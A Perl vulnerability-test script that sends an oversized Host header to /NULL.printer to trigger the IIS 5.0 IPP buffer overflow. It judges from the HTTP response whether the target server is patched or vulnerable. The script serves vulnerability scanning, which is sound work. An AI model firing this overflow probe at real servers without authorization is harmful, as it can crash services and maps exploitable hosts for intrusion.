#!/usr/bin/perl
# By paul@moquijo.com
# Based on code by storm@stormdev.net
# Tested with success against Win2k IIS 5.0 (+ SP1)
# Remote Buffer Overflow Test for Internet Printing Protocol 
# This code was written after eEye brought this issue in BugTraq.


use IO::Select;
use Socket;


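print "-- IPP - IIS 5.0 Vulnerability Test --\n\n";

# A host argument is required. Testing defined/non-empty instead of plain
# truth means a host spelled "0" is not mistaken for a missing argument.
if (!defined $ARGV[0] || $ARGV[0] eq '') {
	print "\tUsage: $0 <host>\n\n";
	exit;
}

# File-scope lexical: sendexplt() below resolves the target from it.
my $ip = $ARGV[0];

print "Sending test probe to host: " . $ip . "\n\n";
# The probe is the request string from the original script; sendexplt()
# returns the response as a list of lines, joined here into one string.
my $result = join('', sendexplt("GET /NULL.printer HTTP/1.1\n" . "Host: " . "A" x 257 . "\n\n"));

# The interpretation of each outcome below is the original author's
# heuristic; the mapping from response (or no response) to patch state is
# inferred, not proven, so treat it as an indicator rather than a verdict.
if (not $result) {
	print "The server tested has been patched for the IPP vulnerability\n\n";
	exit;
}

# m{} replaces the match-once operator ?PATTERN?, whose bare form was
# removed in Perl 5.22 (the script no longer compiled on current perls).
# The dot is escaped so only a literal "HTTP/1.1" status line matches.
if ($result =~ m{HTTP/1\.1 500}) {
	print "The server tested has the IPP vulnerability!\n\n";
	exit;
}

if ($result =~ m{HTTP/1\.1 404}) {
	print "The server has had the .printer mapping removed.\n\n";
	exit;
}

# Anything else is shown verbatim so the operator can judge it.
print "An unexpected response has been received:\n";
print $result;
exit;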

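# Open a TCP connection to $ip (the host taken from the command line at
# file scope), send $pstr, and return the response as a list of lines,
# exactly as the original's list-context <S> did.
#
# Optional $port (default 80) replaces the hard-coded port.  Optional
# $timeout in seconds (default 30) bounds the read: a list-context readline
# cannot return until the peer closes, so an HTTP/1.1 server that keeps the
# connection open left the original blocked forever.  On timeout, whatever
# has been received so far is returned.  connect() itself is still
# unbounded, as before.
#
# Dies if the host does not resolve, the socket cannot be created, or the
# connect fails; $! is included where the system call sets it.
sub sendexplt {
    my ($pstr, $port, $timeout) = @_;
    $port    = 80 unless defined $port;
    $timeout = 30 unless defined $timeout;

    my $target = inet_aton($ip) or die("inet_aton problems");

    # Lexical handle instead of the bareword S; "|| 0" keeps the original's
    # fallback when getprotobyname() returns nothing.
    socket(my $sock, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0)
        or die("Socket problems: $!\n");

    # sockaddr_in() builds the address the original hand-packed as "SnA4x8".
    connect($sock, sockaddr_in($port, $target))
        or die("Can't connect... $!\n");

    # Autoflush the socket without leaving it as the process-wide default
    # output handle (the original select(S)'d and had to select(STDOUT) back).
    my $prev = select($sock);
    $| = 1;
    select($prev);

    print {$sock} $pstr;

    # Read until EOF, or until no data arrives within $timeout seconds.
    my $sel = IO::Select->new($sock);
    my $buf = '';
    while ($sel->can_read($timeout)) {
        my $n = sysread($sock, $buf, 4096, length $buf);
        last if !defined $n || $n == 0;    # error or EOF
    }
    close($sock);

    # Splitting on line starts keeps each newline, matching readline's lines;
    # an empty buffer yields an empty list, as the original did.
    return split /^/, $buf;
}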
